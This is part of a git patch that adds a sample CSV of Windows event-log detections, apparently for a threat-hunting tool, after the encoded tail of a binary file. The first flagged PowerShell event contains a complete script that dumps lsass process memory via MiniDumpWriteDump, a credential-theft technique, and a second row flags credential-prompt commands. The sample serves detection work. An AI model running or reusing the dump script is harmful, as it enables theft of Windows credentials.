zWC8|yv2w-Relel)O7z2#M<1|)v7$JQ(=28Od9byf^wQrL3{ zX>XJykkm4#Uir=ZOsTfK%i-JP+SKlY(td26Nos2S2a3L2=sv||N*Rr2HQEXd0%K-E+oz9(3Dy!#7T;$iH8GuK-uIkl6$)n`yYcbpQcR>S& zQ+Ho@@=mR#IIU0moCX1Z_VF6vVnrm!!zUpx@t~gFcv8d2Re#0|x3^Ymkk^jF_so|H zv~H_+rIV*0Ars~sFGaxtl=ZMa1 z1;FUB2qcRqu|EHN6zD735lm@3mvfWa`ZG`fBQOYLdb)My#;#>wrnB|gd|Jfw)6KbAcR#CRVd2?hlJ7>d zEvPHpi;OE2oPUEG$;?8^GqKrc0GPF_k-rcU&%Tjumw?3 z&V>^sgWH;a8Vgf6Vh;2kM%O@WM&GPeNbs&oh!q#KnA&IAo-!cGPiw&U0V^*xB}~Ck zWR}=_Z?}K+y0Em~mn3f%G2>t4K{BlYnwo4 z*3X-D2b*o+to5{<8%-uaH~EZGXzWMRz#BGwbA4Dlox9GO--)1O-o8#xudxFnd-{MW zqr>|xRR1bY&5I{vf0%mUSf4D&6^?Au)Ht<#jnSc;14K!(oN6ita3f2*(KER-W?bjD zVlz`Y{x$?b@}N9zJJtQ@WB{|k05WCJJ+R^e!`5%ks9xM|aD7N9%|nZ35=^xX9jN}Z zzRv+_n!d6>CF!0d|JD0_(#H8P-1xHCbbj3ovUo|+inZRWviRwh%gw!+@`BIy&!s77 z)QFB5P){_SZ#18nPe~2rb)48rkIPT&b3yuZlX(J2`6U^x<^^zGu(%Q=lFFdsZ`gNj z?{w9T*qym?GY6Y;ts4z+_VqKV4$LjOKYgzPerpqCnritUw0}qg7R=C`H{o5_xS34P z(>LYS>RD9y&AU`(6}uKO^3PV;NYJfZjBL4Xx?Em+Y})&GpKj^lG7Z=*MJDr`HP`on zK=B(!J<)1D6~Y(dl$qr+ws^#qDwnq~-Rl0Q%A~l>e{*d`pr{V#lX`+2R 
zfeRe{>nhbR@N>V?3*wu_L+>}#6xTw2^yEFVDvjd7X%npR^gG&q1!n9fK|gMM*UVai zQeVc)OR1$1QZmVLk?+IwM{$9R?$`qihp?NW ze#P!XvVm!m)un;#A2ul6=QqvYBetABaD&+;-eh^rBDT1%wMcx&2JDibs!+RScAIrR znj$V&2i$CS+fy!!^tD5K%`pNR$?~0!NbojC;&(0#m)}>T#4BW-ID+sx`6)P<^Zr@53Y`KE-{yihkfMP=|o|ua7 zhiv$1;SrB)r@9ej9(YU7$|#&hOtU^kS~PJD-!9kXV6N)JmCf{}tH0Q$ij%8IZ&Kh| zK-9y8XV&b{>}VRZwgx8nzQR*;lC;Af1MEp!$q-L=&5{dIX7~1Tei{Ub} zeH;d(WK3EA0YlUZX%8ity0R6N3fmdT8{5v*WB%OBN50=s7}#W{b-_<*qf}F9W5&ur zvuNA6k}J=+1&8sGu<_A^Ds-`aDbbC(9|EP6ygY>3ETtOJ_bucZ73}~KjVkCXM65rN!(t=Ya&fz@+8oo=S_ms0~bx^t%egbMvGSv7M)4+6djre z4N)jy2pK}dQ8Jg#XSg2-;lNQEW-VzLa~{~0R+Yx=O#%rrx5K`$4I+yOA{~Zl;s6DdxPf(N7 zAsR^*Bh%DnBtAEOlNgJ~a!E8v8V_tJHMl!|yV>&V3Z$-4=QKFUZvgpY9b-%DSgRQ7wnH%sd zFFeB?G;i_Euu8#ZsUiVCn=`q+loMCHFS(_YKhbuu;aWkleX}4YG-6HJBJ&y)h8E*o zJ0Va{1VUPP(@2vK)t~dN%Y}CG=coadBLqEYVs+_@wGdRG#Z)?}xw< z7m#j(TMy_5k767iX+ASSYYb8m9r|CUT(Ex65bM~B!|c&hYI;4KC&K+}rxi6cZp*A# zv3oYDhf>L9e4*GtCi;|68=YU|qO(Uj@YUSF1O)6*oA*PV0;F%(+w0bDE`Q5aDu>16 zLQIiJ;9b%WIs#*c!)41HM)QY40^N(%Yl zc+%v4LhM5tIGz|RQS`7t8tzz?Js>XdFjR3zK{jH0pzW+f+Mx>Eo4qcf$@NET$<}6L z878j%a%XFRORdK`r2rimiw!$fGHnu;E*q*zst*I!M;fMNQIKn3N?_jmlnEm1f;y?z zDdYq`)Yi)BwLJ9ZJ%dSR~mpWe9mc534%bdpu?FzTht(B=vPPp{!r z43i72A(3<$R0cl}hO-B)4T0%3MwzHb@M(*P95zV7S8!It9EYR(0y z(uEPWzrldwiUlQ3*3jNslbyGZRsY6Yf=b0TbzPWbUzc|BYF%&@^yBqGc>P$)TXWKK z-n-b)rItZZ9rNgZ+$&8Ullk^kbUPJkBy!Pu3 zKkUswh#f?Tdaoi!>yh(hRpvB>r@F0k=l%z2gr4#F7q*R$1D9MKZkZ3ID^hFW>AeXV zU9ZkBw^gobjbEi3Ybz`*@)rdH)hV|vjmsHH5r(L?52`<&9Zx1kvnDZJ@mz`3rPm&Q z1Ijwhr|b7er+)T3Q06~NbtQF-3{zzuSG&@5h+%EYgmFrQZnk-a2tDHjTC#ym1&()*rR;+TG`F7qMIwH+BsznT|?woDB zt?+$rNiNtueY(L(89se}Y@M7ok9+}nlS7--98=EIDVHfY)7r`1y-+aGdF<|BgS!_r zZr4f?=5A_eOpc%A;#Sedh^P?d;yAZVVh@`JNFvqWBadZ9+94FUHKD*4l-ZO52(W~% z%`Y%hT7+I&E--DEl^naNX(>otJ<17_UzrT6DtC7Uo@$wo*Inu8Q)uQO>wCkp&xKZw zx^n7%oq3*egfOWy%{cAv5ef;bUOKPN)h8LLKg1%g{4hCHu|Ji&G+Hz0>&?Kw3nUox ze`0gakvXikwB^Pm-zso)#oZEXHhAef%OY?_rwhD3)H%@}%zLeF^pA1YKXR)&5dDL? 
zoSzQ7Rklb2g$Vxl;hd^|$7TryKX98EW z<|O8C;5P|zX6uA&w8FE2BeA;0DXmE zAu0$Eqk`zn4if}mD8u>p=4Ay;g$WKYly|}ap)!?<0ij|f&jO)hmuvs`LrXY-ZcCCp+4c!OhiT~*!LoTA@F#R1Sf3x%C*fPz)fU+()aO0YhnMwJoS`iE z-$R6+=vv>Azg`e`_<}z%){u9)t2+Pn4guj)rtmYIF!IcgXAtcp@kBupz*rLNRgL*~ z-@nKH(ndQ`X%VD569NOpOX!13bW8u zy}9-!njyXT%=VotI6x5`;+(5xub@P*cOvQKkSf@bZM*49s2PIEPiLO1*A}*tZ$B0% z@N0Bv?Kh6D3_0_P5;fSwXls}B5%Nep-6aMjg)w&0O&>Ynz{nO6BK+}{P@oIiBgdkq}2D-3LZrF&1&oqx?lH8b+H>4;k17fk7>{CrF6Nh{Nfd{Qzny&H8U45!e zwquWz<(6D8yEm+#GX97t-&Og~v~k08o=kVz!fColQ`mVmB{Ail>Bovm>^7e!0M(h9 z+-O3UoLfHQzw$-{)PwI_P^G=>Q4n%`U^sbeMCtdXw#kD%rgV`M8zI`Bx1v-=+Azz0 zFQr*7Q~t*js51xZA+;;{aeEg;OqXv#e(GcHJqGLia?`ekX-f?g^r{YAqLA7w|C>)L z@Ex^Imu8LXwaqHC_{Q{o(@|J6ej?OXpkmCLEm#c2apJ@70)6s8#IBxW{PyrDg}fs- z`I)3fv%CO|{;dzVu>|vMFEY@VIYz{6Ua7X6WFMMp`-m0Y$B%;V);sM4`C1!ihKm@dv{I%o+j()!V<=3qiY#vRi-GIp zsUK%JKEo#q!Q@4K?(UIN^QQE2HSkQK-Y??`u+q*dk zVrn_Cp)NmJ2EIc$ob@LJ?3yMF%_&%w=`upn_bNQ`Ao`i%!il3m*5WKzWhD0|7I4?H zrJ1IBZR{%6wdM`TQlAc2SSwYD=1Vf2stffUT_bn))p`c)E5;2)R%M%Ilq&36vmz+7 z*YT@ZBGaa+=r*U^1;8sxQx!4tAVoQ_yJ%rb>s(xU%;i#^3^m5Vpm#xe{_5pCs7Up@u?c&MH*9 zp~xB{^41MHwK>ZMNgaWPCj4OZm~>*2wbPgoZ2g5HX%zu2sHCUCJS{%&cmUWsHAPis zv#z&2iJh}bTQ@65Pj&O0b|gi`iRQi?aDeF~+?Us23`NCe?HR}xvSi(VgDkW2R;{l|ZS{SI`ELt94+U~a&%?N3JIUT(ar?$Xla;OYd3$y{C z>e^hZ48g8E7VQ}3xkKH+u^LnzaT?4OMtJ7u4QWh8iz;w$bW(FoKIr%E z%y3GgyxgD5!7{ltKD4yWC{+0{Q>$6M{GPzZQTgDIz?Po6$F~Msk=zE;p{ktqE${mx z%Y8KcK!v3OI*#dD4UuY;I*nmt_`?5h;6+gBdVci7urZ9c!hAx=piz!-hPM%3P%=0< zoZJycsLd|{vpi`B(OFgD7qk3WT&Bb6+z6!H>0GGa^~WE+BNK)<{B;CRLhGQNZHMjE z_H6~q7_vM)_I%oClME(k={Wmi#{!3!GBFG*zsD(BS*urrBIU5k3C7cs+Z#3CM=w5J zZIhtD2$I*h9D`g^aX$Xg_d+rpNN5=Cp?QyUP! 
zFiI({XXXe5nI7&3wuH`+`4%_YDTiW=!Gqt*y?sW95N%mS0@l1a&4LLyHVlOV{@^;#Q zvV(;6sbcTKLsS2?z1#d+pEPbopt(X*p`)!jV7-)PxE-$uH(;PRkh1-$j7Fmpx%n8& zMTAc}21I-|7%ail&I}qQU#fEpH!hToPu1>kVP$CZi<1nq$A1A6wKfCE8WFSB^31_N zK3Z+iUFE+wKEJL3SW1x$#s6;`DNvlLPvWeXvu))UEPF~dv990u<$LA4_dd4XTN?&C zpbGnrjVV66D%kNV3M?*#^#XJQO2~2|-00WJ|KGv{^P#_EbbS7_fmOQ;3+)JORyoYGOAaE05{H87*>BBJ;uNwz5DhEsJH@ zt1?3p=s3!WSeUpRodrPmB5$^L-X910nJO$}gfv^!4ydd(J{s)>T0gGxKV2uj;O1}B zyVpM8TE>kxL>G4VMGVZhcZuuIBr~g2%=0W3f&I{rqf(#6Ny^#UZL7SZq2}LEZ)_c5L9a4uimtB9}t!HuF zAbF0a&A;6Vxa$db+FCipKaI%n;e-fd@Z9~<0{s>>-m&8>CycyT7cXw6;DRz zFz0WbZTSsema|)Qx|4d=4Rgc(`u$aZ**3U;ty(JzSHhOAX;t!QqIAk&>l4S>>!RRw z!fnKku6f_^6>$gaZi)`um?^5XJh#DX=YTXZZE-}oYLwmOEau-NQ70+?+{6Bz&lp(WJxw%g?Z)jX(XAh><#wDsbwr1~j zO1|^Jrj~Wc3>vn+2S+PSbu?W1`esfFY(+aoL!-F_9qQ$j*NZZwii54;R+n~T%;s}W z`iTUocEvW=$jze{!&xv1$BpoU%_C0L;>kc?x1ZCVQ9F~i~@xi zYUg!NEQ#v*d!1tvL!xj{W$|!GP?m_S1o8(cU=mqq|J$Kv5SwgaCTH1gvM!dtWA`uO z05cb^JmvMqABXOO>|1iMH}w#uwI#|enYXjZ0yNhRDT|V(>BI2(%9ax`Vk6eKm5Iw= zMZL=-t9ejlyQb5JW9JDXws+a2eQV6+(&?0Z*~-C;!FQ8ip1b#seY5>JSxxiQ zgi9jT?M_LIjqpQK+9~0*l4SnamlG}_#-Y69CdLpg){Gw2JU1rBnCOB6VxaJ4n0*NZ z2>7XoDS;#GH!s9pw?l8o2I;KHqNv5eurNqNj1%c3Jr%9Sk>VG-8{w-_Hgel+`L8$U zt6T5&QFE)C(U~W%)1qB5-mf!H54+CLA^Ul)h9_O6Qp&q6lgJv)x)WX>j>N4yzL zom6fq+?F777lyMT?>&oge}*3tT)z?L_zm2~xqtjWjhzKlThG?$ad#=SSc|)tLa|cZ z3GVLhF2&uoxE3e`DO#N3F2&tFxa&)Mzx(}fds*+jWMwjIlKne#=Ipa)kDM9I5q>^5 zLVO}SQRhy;_L?<@LT;^)YOEUB?jt0Q6xInd%~G|PFpws<6OglZ$euJ2a9p;JuwW znFR>(?Q}bRG2uo2BVto2TKb|=z0(}CMEKtkFE>?C2@i{}D#)SRe3PCEN52L=e9~M? 
zdBJEE$gFlE)U0{Y-=dUR{$L+zp2fmXASd{5(f?&U8(9Y*#Y;dH)REsH@c$=KsUA_{ zC9Vn_g_jh|44s5p=T($A71XU6-l`_nLzR&Hm>fW(ZdNl#Qevd2VC?3dU%OJ*y;#ot zljTx<`ojKuH?J0BBZFv)3SII*W?8tq+Mc}43sD}RNTs8W(f9c|X&br+qzz?<6XpWi5)izT0J!=g zow*bK2CfWm{;3Q#?y(W@9$BeCEe)~kk};X5piO^zIAXBPX0`i0KEUnVWCrk>MZynI z<7VtgJ2d6NRiS#2NuaNyhwZ=}UM6=%#bhb36lUPbl?)ghXq8qLi$A4W9~rZKw609w z!u?sUqR!G`v-l+wHw4yABX9t{JXsw3#?_70heeCzEHxCb57OOZ8iB#s;aAUm-@?6k zkAn%tIBb$|S$DgwW)$UvGxL2cu^F5{FNs-|>0~!jiK4}WGo|$R{O>u}@4K>Rp~qM} zc!_0x2whAxp5r$yvLXyz5d_&jp6btl>KgpB>x@3(9U*6{(ocKnGXQ~4h8F|kKD0X~ zN6RiYe8G8@Pj7cFHItJh^$J#K-}KPPzJRv9xKqk=uGQ2jPNvJN+G+2uoLzY8nnUc7 zDW7BIFo|EP=iUjVdKlx}@xN~habKL$_mj209b<;+uDezh2~1>|C4z0%K4;L5qRKe) z=ECj5%G- zyDYxohx0Hso7GxEvxMsFT1=6l}>moOHVl{F( zyTU`2NJ4hI0GWei1zZlCJ=kATAvEbsEFXJk5Q+GowOG&|=L3I&t5qw54#psstfYBX z_q4E5%VCgUlDeFV!bhc;A&pnf&8n#jOPZHnb&F_s1p5U#R%&)G5kJ3>n$c$YG3k-{ z`K8g6Hf!&mY3jI0u2&<^4cMQU)@t(34*>fDsFf>CY@FiKzAWXdg1)$E584lSxhRIz zbRDfP#8J+6SxMqX1aG*TF4q340#|@d+CUJx4Q1W1aTcEIJZ%7Q1fYj9K+wR(z*)XP zt0nsZKe7xyp0eW7VkV^P*P>T%757T0VUSHav zb1t?$LK@Q|eWG~sB21-B$x}Av>nZ*E+nG0mc$y04CHR#=m=^zkL18%9YA~t-75b&<2=eeibfyk)!_qh;(&y!3UbJg9qzjKi>V%V10$h#~G;?9ObLoSVjK~ z)_0l;RB=xf>&FI;5g$lZa&~^!XI^bPG(`O>DW6=#=x4fhOKcJb)N{bN-MKE6$-<~T zt%m>^q+>XL+IUsY8EL(@sI9si*pBgqy_wg>-@6Vws@uhC^hRLZw&nYa4HHzEb|6jl z+oR%jC#>kQ$IQ5&0N&vIJ9m}y252=g}O;Nclk?-<0n#= zU9-(cRfdWT`1e0!PE&~9X?ozK4 zl1$uJH`=okm5f^36ebX{NNlS6*D#JN5+)AV7Z^c65+4=u_I9zD;Et@>XbRAhJ)tl&ASBN=}&PB+CSu(Uy5q`bh<1>@bgxr zvA84*ltpz5B@7T-cXyH>uAAp;{-kVpH8y!osuj7$q8VBKi1ps_ZEgvsR^*PkkP6wa z-$D*QIKt<0V=Vgapb5FWZh#&m`gal=D_QqFE3C=h?gwJohg_GBLBC@4X*y6>jq48I^k+B;#H9y&3*_iiyDpyYr~V4 zf*+eC@zyv$nG%wUv8YVEBj8OnzBjrxd^1MUy{#>d*v%#pf6llm6jIbr+JH(a2TI?4 zEJiI6hQqdK-m?Yil`G3ikllU$rOVU7T6I!s%lr*C^p~E&lVB=2;(2arw5~R`X8&x~ zG^%YPuzz3`ihb=9%cghzs3wYgFdA%!LOEOa-WtwacWLc<@Q#8q&zY<)>j>3ZA_nBv zc#C3bcT%&z|K#Rn=XRPCTfS6$7N-TXK4Q12yz5R`SSEThVH-rt_H|Gc@Y%{g21}0u z>iz|ad7}?|kYayDFyOOFv>CF4X5!5s{YIPE%(G{X& 
z;l?P8CFSu@O*xXlQ)IZR;&@O9w#*7iL^%?O*dytK&^nad)udnYb1r8tw=!|OX8&f#eQtB#ob#473U1n8yY2~g zi+_-OE~F*kL7nNo!TEON^k7T}BvSOv13etW(Dv?^RWYymVb9c}Y3A$xSb1?D7?VvQ z5I)}UY4;8R(TD_YlY<`jET`8Fdpal8hv)6`LBUo}ENOJ%Harm-iP(UPuu7JeaJ(KJ zeY&P4t*5+}m;1}8+$9xN-b1HBt9O%h_v!qikZ)RXXfY2yC#}=17coCB5aC+;PnpE1 z1ok1oNI=$KZ>qJ^q2$`MvGWHvYwO`JiL7H}w%c2I(G036u3Egiugyv3W;dy^rbs=X z3-o4ZWEZ?XsD3I5r1ygS$V$8w7=Xeap)laslr799){Ax#VGW;&Qi|z|km|RmMPbMq zbyRdZMlALI%OllgV$^uvSIFGhvp5{#;_AvflBEQ4y-4HGZolPMF0FoTw&O$PfGnl^ zZ=(HnNys00T7T>jUp%D7=4&PflvSHk>6shR?kyfheYR3dw86V!-BQzzPIz6*yy>B9 zebC0L{Qk3~(1-}Cs(=+|#8iRPeKo5_1`Z!<;|ALeX8|Y+;^F&XsN06PN6s$Qa>4YZ z@NpgkFJ?*7KU=x<5)Vz<|C&M0=tOPDtZQ=NzLpss5$~}DSyjprBy=O ztb227WAJ#KVxTIr89aZ30 znIvUu?c5KOD!7!7%oAyRMyoo4;*w#Quo&~-K1m3fX%PYwx2qB6Wxi_lgV$A>E8y`D zohjg9>D;1~)e?)S?N*O1Z2ENi4PkzCylJzTk#;z{=Vk!f9~PS2#!U@pftJxB(Pdja zyiKfrmPbbhk~$Jj09mL9qB_#{`tAMhvT;eV94fcoa_F%gju#CKFy#sEUA9$JcVJca z6>7EMXz1K3=gy@_p!_Nlx#8fHcjhAsax2c`D>{hde3pnu%yUT}er_jEH=N6$c<&R+ zgQqHz^I<@URmF7e<0i#}8Z#4=M$YplC8VWk#?wi(*~we{Dlt zRJw%!c<9Rr9pQ56>bMAzp{0fXrP0Qb7w#WE7Q8oO~d!x5~Hl#xTj?soiSb6 zb(3@HLS?kFELlAl+E8C#p`iLW2XM^Kv6Q8g$?o0Sa{KTV!0kVc&H;VY_%17c{fW=i z%S;GRe(qDY^q4gU!71dvFgsT-xVlkPm&@n*g#_)2$a|$|`a~?UEUn8Y0`BNCvsX!C z=?Mb+im0MDtDH8O3a{ca^nNpC<2xU%o87`x30eHR)}{&RnnWO^-S7vzyZbx>SmCEE zjpoutC+0G^u+ORd49VS48jgb%0J`X*dZHtSh=0!({R;U?&mo*|0Uy8s$Ak@L;tRxQ{^ zXe_&% zIC1kgSth{VmU~-(!O2ar?no&@98Z&7oabfnfdxO_TV?lDwaUlc>iH+EY1@yMF!BeK z>X^D2HjI9kpyh>Dfi_!d{Ll-PtHPt+1(wn?`*l~!Yf9`ZloubD42nD zU7nY?=~=ws$%7Vy<<03wEt(g`+@y^M^vV|R^=9YYl==FEOfT7~l*-%&&%7n3(LCGj zCbN`NPMn4lrhaM-pG97gMxP5!-Fwml0WR#RMy6(u zQ^+HsFBWB&GNrjmA336@#~fiD)NYkig8(>aYoU)=odgZuI#8Rzpa%sCu)`70pt?7c z1d2atjJh-wt+(27?RXKo&Z4zCYv@(RRGqPImxYV0`yp#DIuXwwS|TT`<8Ym!Heea#-CP7?3HK!1rE8EtL%zLGVXA%02j zw_CH9-JQ&7g1Z_l5z|_4xCuJBtc%syLNY{+O&n58e9ZiLQ8GMUTexfp}Om#Xh^9?al249FQIqRVw8L+g{llI3{t8mbGT}wbry>aP=(dUb2yG=+Xks(;<-31N@)!hI zMA4SoMr%igVdC(`gGXNyMaE;$thOEdA^fih8-r%@#wPKLL$n*BUx`KbhAlo&W{iMpxFaZHE~kZCH-8L=}0c`UFyMXr`xK>Y}Nhu 
zxvEg|{HqERY#06m!x5y9)aCIFDkT=o+NG~EZTfX*l`Y~DET*pL2tl(dMkD%;Tq4P> zwL7PTSE7sa2}38S>_+G&{lAk99B(9#n@#f22r7``f$!fapO97}!BAqPd=S0!{e<|X zVDt)+LRPb(2Aes@d}2Cog14O(EhYQy2-2QM!epXO@~a4iptjBuC`$5zh|sUcra*e0 zoPjAim4G8VErV+7m;5PtMAty}4Kqk=Df?I;q7@>=a*~RZNdgpf|1?y8T@)y(;?$KG z-CrHUvAvaZVXY!GLg%|txVEblS}-L`!_k<8$khX&)X?Q{0tfsM@KF}w@L>$W;U~&+ z%~oD~>7_!W)3seQ9^Qxih{YaG-pFA$cKeg_^9*N3ciS=lJNrSUYUwc!;rVlnTAE2= z@wQ+4pigpZ?gZBET6~i}Szycb@J`&$93vL?z!~ASsT9hp@4;mNR10O5P^5Y~ayqb| zz(~upi$~kUea+2=D;k_L@5&o+b$l7knD;hpYUk3SyL^F9Se9n4&@?O8 zE9?>+AvpM{TD7f=*nL?m8z^vx1Ntd_Sv;1MWY&BT>yFC7VDz?JD&m+NJMr83%RDFV z*LMkcHQwrs3PYQ`KirUJH7WX{g&J3 zE*77N@5GDXeV&`m+dvH7?Dynurw0CPtL=D7vuIZ512(R-B0FGANErKKHm#^)l$~mi z7|_fUyNL8Fouv@x+0A#BvFt;Xb%6v|}8A`BtY0*|l+w8RsylW{sZy06{qF@hTsJxw$ zzW$<4LRlxx?35?7%IJ<0g1{ zWSCzYS7yYA_o?F6otAoz|C6gj;%?`P#k7r zYBDzh34@LjuO5SSEG(GZ-{~%wN4l*%V zm)YH8OnM?~Uu-$?)9p~7^r_L3$VHwVC&JwKJKMCzow`2iUX9wteGuyba~#8p-$hc@&#+{)`O8Q)P%Keqz*CZJ+gJxJIvyS`U_ccclRhGnD)0=|w$P zKW#c2H6Kmq{&QxV8$FNFJtv2&Iy>0CajTTN>tc-t5?T9b;mrcTMVk1eE|cKh>^KTk03k#bPLL`rWfdVnH>bl~Q(iD*`yGy#M=v ziEF)!lIw@ixw=}+gb-jNYJrf(4hzMUyfJ-DP7vJ?D%;+$vY=jHLhQKfG0VW`tryy+ zs5LY>AL8N|99GmBR_T=G^mve-lE$6d4PFFkD6D5L8C0yEnLlCXxkUbJ?8*rQ$C}Ev z%h#I&EoARLGUvh=Pbk=3YYEpFxOZ8;xofKLz8od8?sNAfCkYLM0|5bn0RHepn3VP0%%oGOWwe&97Q?g>Cgj}{-0Fx{b_JqQoi2IR{Xd~wH) zuBx4P980-koy|S4#eP>WiGVx>jIcV+zDhJG8llK&z4DQ7_|$-*0?$h+pLwN1 zoSQF6I{+eFPaCAL))4-_@X$3zS2u{K7=-AG)fl)WR@NJ#5qAAt`Oe15@LL0NOczE0P#yAn$+60TcI zvRm&B-ndvP=f%7}r;8&sVY4z1($d9k5m!-)$y;S0ph%w@^0U5_T?zqsX#-ljX50Mc z4oDtlzM$v$gI4LDApg`7{96&l3b2OA6F@*<|4U08O^vLKn0|*WzjOtpCLKL5gx_*T zC(=?Eh0Q%wmI~yU%?||CmMm5m^@Q?P7QXZ-{oH5mAPB-lL{~`YArL5R|Dwdhn{Otg;sSvkrU9%Z z=A3U^PaB7^bF;F=9Ltx`KrBM&>G?d&3&dB3^g!UtGh+X8p+3tFleN(iiai`I4t(y} z==6R@>>Y%vT3CB1Z=Toa34!=YNY>Rr^~cHsV98~ANHK2pD=q$~1V;)1=CW-^Qo>=x zjFv__Ba`7)?PHzp3-@O0kSny(QcHP4164&F+sI8>?0E!Teb~?vAI&RM4xa=>hLo z2afoj_S0lXvt(PnZmuQSwD+!;z3AeOnf|_W+0YdxE6K5 zvr}R%lJ@L;>d{RTfOr{p20$T|qQl{Y%7>g$0KmFhgndSwextO#h&u`))wUmhhpUB7 z#sZjtScqIhvW<3_TK!= 
zSie;;>Z=$v!k`pAVoCkU`%G#=g16l)KV#ojhDk{f%LMA!)hlA`#xO^@L&lB^IcP}H z?H%gx2z6H+RhnrEBMJ9VZb%P)k6Kt=w+>jJC}NW)CA!NY6b#d^9!UfsY6D{|QSI9L z`fZmBgfhxYk4BkUsl=R3Nc+pQc3WAbht0bqKECr_jxag4a%KN4vF3=Z9e78=u|&ip zeu=nod)IQ;a?}zIUICb)eBKHVb!uvREnTO{UW^#fjW(GOo5pH0gq47HTk)C6KKDi{ zQ^Zy+tYqb*@0kU8{cXzE9p)c2A$InNIrM75SOuCt#M{*SxcOz|nfaE_j7>g#FsSMA z*Kf?pLfy7JRibthh>U1&`0+|*NhU=BVme{V)!1z5^SI?unj9*E3A|6C8k3M^kVE9HXe2J}xxVE$ zeC)|iRJo$xSg*E<)Q$5S;Dq&NwfK+{C_aCxWY%vHepB7PRqbd_hgudQ7O2RrDgvwI zZE?9ruC}9dwJ?Z|XYeV909YuTw|O6~K2s+NMPuFp zy_m(7LmY{?wS1HPagp`pYod;F`>qPRk&|wcNd1901H&aOPiy9WOga0-0d7NU4oxI7 zdzXicbRR2T_moHsNs%rJ2EGy3Ty4D^W-w!d$ixvcKB2u@HlE+NUd4~}9?R*w5>YR_ zN>%{u-I9Q!_H z0h#^6Zuab#y;ngGPsbbUWhtJ+#ON>l7S0Aq%cjn2MBBUPi*1KRtrjiq7B%hwX+Kt> zjdVuqi;rjZTZoRKL-}_lvm<(*}jeeQ;jJN^w4rUDDs|TdKW`+UZain?Q zTEoc?IW!E5h-Psi>geP(GLJ2%WHM0NMqCXp!wWAJ8PUIrKeoAPzoTo*bk|x{Ige==c>A?Zl^;EPEuL5`=FD!uNw)l1u1i=5v4D#c8V&*i<3Ed3&(`*Li7GDJ%z>S&WgWfEW|&cS zV50aWqy`o4ThdWJWo`R6FQSNU(s3@QkFX>VEE02Wc0I3d?iXdf8wYSp+H%?5*COEr zqkW^KNiU4ofGW%7E$%28qoHyl9i8*g?se@{#Oey4oUmeI;Ulq`9LnlXydv0oVbOX^ z`{G`uA&aUso=B(m;~P^lI*bmJpa<)C&Tx$)lB)>sk8-;<6)!x!mzL5z>nNOTdF=z) zN{2*Yuu9#l`^LaxG(T#{g@yXiB{H2*7$aG^!Hapr`>H=rl{zJE{WUIb2Oh1U%Sl2);Xwc6x`$mC{!9ShvovV`a>~Fu z_WSk8_t%$(ppCVok+q|aqMNOegVryN`x|hYB|f(c{;MQdOObzz{ww(8+Xcqz*c(|o zFfslL{}v3#Fa}>-y>M#%RwGM^;o6=D7EalyE6nx;6y)T$j z_FohW;IkCY=O`zdtC@pf3J$m_^5-=oEq|86^&F*(&nI^toDU%QR(kn|){$2}OJQMt z4ujsp{n;6u8ACAYPYg%R^O$F~S4+?e!}EX2_fO1v?emyt)i=IX6ylW1i}*Ljr}=rz zvno6moGI%9#?&JHjlpPp9`mdYPb=ij1HdQc^Bx1^ORaT+{u(n15T}zfC42VdnS~7Zk)}{Tqm170SO~pL~V; zehWL8>e(9^DmdDkS)2Us3i_MycfZj;1ZQaIUnc6GUZlT8|L#oqM>HMwx9Hzp3x5Ot zc2@rZcp*dox9j@1_}`A%KjNb({~`WAZkn7VEVzUrAPB*4XLtw*CUo$v0r7tTLBhYL literal 0 HcmV?d00001 -- 2.34.1 From d796e57b19758ab31c439c7404ceb69b809c6491 Mon Sep 17 00:00:00 2001 
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:44:02 +0800
Subject: [PATCH 08/13] ADD file via upload
---
source/samples/Sample_TimeSketch.csv | 41690 +++++++++++++++++++++++++
1 file changed, 41690 insertions(+)
create mode 100644 source/samples/Sample_TimeSketch.csv
diff --git a/source/samples/Sample_TimeSketch.csv b/source/samples/Sample_TimeSketch.csv
new file mode 100644
index 0000000..3d75da3
--- /dev/null
+++ b/source/samples/Sample_TimeSketch.csv
@@ -0,0 +1,41690 @@ +message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel +powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 971 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Memory($path) +{ + + + $Process = Get-Process lsass + $DumpFilePath = $path + + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + + + # + $ProcessId = $Process.Id + $ProcessName = $Process.Name + $ProcessHandle = $Process.Handle + $ProcessFileName = "$($ProcessName).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = New-Object ComponentModel.Win32Exception + $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + + # Remove any partially written dump files. 
For example, a partial dump will be written + # in the case when 32-bit PowerShell tries to dump a 64-bit process. + Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + + throw $ExceptionMessage + } + else + { + "Memdump complete!" + } + +} + 27f08bda-c330-419f-b83b-eb5c0f699930 + C:\Users\Public\lsass_wer_ps.ps1 + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 